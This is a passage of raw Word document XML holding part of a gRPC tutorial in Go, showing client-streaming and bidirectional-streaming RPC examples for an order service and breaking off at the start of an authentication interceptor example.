    </w:p>
    <w:p w14:paraId="32D860FB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>stream, err := client.BatchCreateOrders(ctx)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320D41D2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="41A2D773" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>for _, orderReq := range orders {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F303F88" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    if err := stream.Send(orderReq); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1901F556" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        return err</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2DAF2B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A5F70A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5402FC32" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="1191E189" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>response, err := stream.CloseAndRecv()  // signal done sending, wait for response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2485F04E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="4160A844" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Server: receives stream, sends one response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342420EE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>func (s *OrderServer) BatchCreateOrders(stream v1.OrderService_BatchCreateOrdersServer) error {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69101756" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    var created []*v1.Order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295C2605" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    var failures []*v1.BatchCreateResponse_Failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2B573F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBEE606" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    for {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528B61B9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        req, err := stream.Recv()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4830E57A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        if err == io.EOF {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E0490C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            // Client done sending</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355F0F07" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            return stream.SendAndClose(&amp;v1.BatchCreateResponse{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD045D4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                Created:  created,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43139807" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                Failures: failures,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BC1F5B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090BC599" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A82266" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043C7627" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            return err</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8D7A81" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A17384" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D961D3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        order, err := s.createOrder(stream.Context(), req)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8AB173" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C63B6E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            failures = append(failures, &amp;v1.BatchCreateResponse_Failure{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E2BCB5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                Request: req,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196E4C1D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                Error:   err.Error(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376ABEA4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152065B5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EA9936" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            created = append(created, order)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410478E5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639EBF95" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C28A187" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC98F30" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pattern 4: Bidirectional-Streaming RPC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5886E16E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>protobuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49830D41" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>rpc OrderUpdates(stream OrderUpdateRequest) returns (stream OrderUpdate);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A05DB7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A380CEB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Real-time order status updates: client subscribes, server pushes updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53549299" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Client can send filter updates, server streams matching order changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E88E1E7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="144F5175" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F4B6C4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>func (s *OrderServer) OrderUpdates(stream v1.OrderService_OrderUpdatesServer) error {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64145F0F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    ctx := stream.Context()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8FA4D4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    filter := &amp;OrderFilter{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB345D0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518A0C83" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    // Start goroutine to receive filter updates from client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380ED029" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    go func() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B54952E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        for {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EBC8D8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            req, err := stream.Recv()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E84FD14" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEDD6B6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1552D412" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259E62C0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            updateFilter(filter, req)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483F19AB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C89E9F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267A0A03" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DEDD2C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    // Subscribe to order events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD7B0C9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    subscription := s.eventBus.Subscribe(ctx)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA5D3A8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    defer subscription.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B59632" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4FBE8D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    for {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4DFE83" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        select {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D29D8E2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        case &lt;-ctx.Done():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69722227" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            return ctx.Err()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A951A04" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        case event := &lt;-subscription.Events():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25140237" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            if filter.Matches(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA5CE00" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                if err := stream.Send(toOrderUpdate(event)); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DC9D8E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                    return err</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14953C56" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C386A83" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5AF110" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADEEBF9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650F7E48" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6C6D4B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="40A9A79E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47903C47" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>stream, err := client.OrderUpdates(ctx)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03654E82" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="6081751E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Goroutine to receive updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6176D9F6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>go func() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279498F2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    for {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABC48F2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        update, err := stream.Recv()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744714E6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        if err == io.EOF {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F9A31B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F31DD9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCCDBE8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        handleUpdate(update)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671D3775" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E57E29" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D25D200" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="7EF5FB13" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Send filter updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAE0722" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>stream.Send(&amp;v1.OrderUpdateRequest{StatusFilter: v1.OrderStatus_PENDING})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5854674F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// ... later ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390C383D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>stream.Send(&amp;v1.OrderUpdateRequest{StatusFilter: v1.OrderStatus_SHIPPED})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D63D46" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Interceptors — gRPC's Middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F97A59" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server-side interceptor chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D792F6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232D86B0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Unary interceptor (for single request-response RPCs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2494E4EF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>func AuthInterceptor(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1F6AE1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    ctx context.Context,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73543392" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    req interface{},</w:t>
      </w:r>
    </w:p>
